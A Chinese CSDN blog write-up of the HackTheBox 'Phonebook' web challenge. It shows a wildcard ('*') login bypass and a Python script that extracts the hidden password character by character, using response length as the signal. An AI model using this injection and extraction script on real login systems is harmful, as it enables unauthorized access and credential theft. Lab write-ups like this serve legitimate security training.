HTB之Phonebook

最新推荐文章于 2022-05-06 06:18:23 发布
最新推荐文章于 2022-05-06 06:18:23 发布
阅读量688 收藏 1
点赞数
分类专栏: HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_cccc/article/details/116401931
版权

SQL注入 通配符 Webshell 登录绕过 Python脚本
关键词由CSDN通过智能技术生成
0x01 提示
Who is lucky enough to be included in the phonebook?

看提示意思是要枚举或者查找电话簿?直接打开页面:
在这里插入图片描述

0x02 尝试

查看源代码,发现什么都没有。

爆破是不可能爆破的,只能尝试绕过,先上burpsuite,对输入框进行fuzz,看看有没有sql注入漏洞,没有成功。

然后尝试通配符*绕过,尝试使用用户名:Reese 和密码:* ,进行登录。
在这里插入图片描述

登录成功,进入到下一个页面:

在这里插入图片描述

在搜索栏中输入一个空格,搜索,出现下图页面:

在这里插入图片描述

没有找到有用的信息,查看源代码,也是没有。

回到刚才的页面,将用户名改为Hun,密码还是*,尝试登录,没有成功。

0x03 猜测

本来以为该页面区分管理员和非管理员,当前登录为非管理员账户,所有没有获取到flag,但是换了用户名,没有登录成功,说明关键点还是在用户Reese上。

本页面有一个漏洞就是通配符,想到是否可以利用通配符来爆破密码?猜测flag就是用户的密码。

尝试输入密码为HTB{*},发现登录成功,说明flag就是密码。

0x04 获取flag

当然,一个个尝试不太现实,我们可以编写python脚本来进行破解,脚本如下:

# -*- coding: utf-8 -*-
"""
Created on Tue May  4 14:11:24 2021

@author: Fstraw
"""
import requests
import string

pw = 'HTB{'
url = 'http://xxx/login'
#HTB的flag由英文大小写和数字和下划线构成。
words = string.ascii_lowercase + string.ascii_uppercase + '0123456789_'
i = 0
while True:
    #遍历所有字符串
    for w in words:
        #提交的值
        data = {'username':'reese','password':pw + w + '*' }
        r = requests.post(url,data)
        lenth = r.headers['Content-Length'] 
        #登录成功的长度为2586
        if lenth == '2586':  
            pw = pw + w
            print('==============')
            print(pw)
            #跳出for循环
            break
    data = {'username':'reese','password':pw + '}'}
    r = requests.post(url,data)
    if r.headers['Content-Length'] == '2586':   
    	#输出flag
        print('==============')
        print(pw + '}')
        #跳出while循环
        break
0x05 总结

考察了对通配符漏洞的利用和编写python脚本的能力。

scrb0y
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox - frolic (考点: 信息搜集 & ook解密 & base解密 &zip 解密 & xxd解密 & brainfuck解密 & playsms安全)
冬萍子癸水
05-14 1800
1 扫描 22想到可能有ssh登录,139 445想到smb利用,web开在了9999进去搜集信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |
HTB-Phonebook
TA不懒,但还没有添加简介
10-12 203
HTB-Phonebook
HTB 做题笔记
shuaizhijun的博客
07-19 1373
HACK THE BOX:Emdee five for life 题目类型:web 题目难度:简单 题目考点:requests模块,session,选取元素 注意点:可能会因为网络延迟的原因导致没有出结果,请多试几次! import requests from bs4 import BeautifulSoup import hashlib url1="http://46.101.20.243:32456/" # headers="'User-Agent':Mozilla/5.0 (Windows NT
Phonebook 导入SD上的.vcf联系人
weixin_30922589的博客
01-11 2389
2014-01-1117:29:22 1. 当用户选择Phonebook中从SD卡导入联系人的操作后,程序回调转到ImportVCardActivity,然后用户选择好要导入的.vcf文件,并点击“确定”button,调用ImportVCardActivity中的importMultipleVCardFromExternalStorage()方法: 1 private void ...
HackTheBox-Phonebook
网安星空
02-17 712
HackTheBox网站CTF靶场Web相关题目Phonebook,主要考察的是模糊测试的能力。
htb
03-11
相关项目。
HTB单线策略测试
08-18
在网络安全和信息技术领域,HTB(Hierarchical Token Bucket,分层令牌桶)是一种流量整形算法,常用于网络设备如路由器和交换机中,用于管理和控制网络数据流的传输速率,确保网络服务的质量和稳定性。本话题我们将...
HTB
02-12
HTB
ROS PCQ HTB.rar
10-23
PCQ HTB(Priority Class Queue with Hierarchical Token Bucket)是ROS中的一个网络流量控制策略,它用于管理和优化机器人通信中的数据传输。在ROS系统中,HTB是一种重要的队列管理方法,用于实现带宽的精细化分配...
新版HackTheBox做题记录(WP)
midi
04-19 3192
HTB(Hack the box)做题笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
[HTB靶场记录]TIER-1(下)
Madess的博客
05-06 902
Crocodile + Rsponder
从安装Redis练习常规姿势 到HTB实战 postman userflag
weixin_46128614的博客
01-13 591
实验环境 centOS:192.168.49.16 Kali:192.168.49.129 安装 安装过程参考https://blog.csdn.net/buyueliuying/article/details/82316517 centOS7: wget http://download.redis.io/releases/redis-4.0.11.tar.gz tar -xavf redis-4...
HTB靶机渗透
萍水间人的小天地
02-18 1033
信息收集 这里可以先设置一下hosts文件 10.10.10.168 obscure.htb 扫描端口发现开放了 8080 的web端口 页面提示有一个源码泄露 Message to server devs: the current source code for the web server is in 'SuperSecureServer.py' in the secret ...
常用端口总结
热门推荐
u014182755的专栏
06-11 12万+
TCP和UDP采用16bit的端口浩来识别应用程序。那么常用的知名端口号有哪些呢?
基于Android音乐播放器设计与实现2.docx
最新发布
08-10
基于Android音乐播放器设计与实现2.docx
java基于ssm+jsp省出口基地公共信息服务平台系统源码 带毕业论文
08-10
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;JSP技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
java spider.rar
08-10
java spider.rar
ASP校园学生信息在线管理系统设计(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
ASP基于WEB个人博客网页设计(源代码+论文+答辩).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值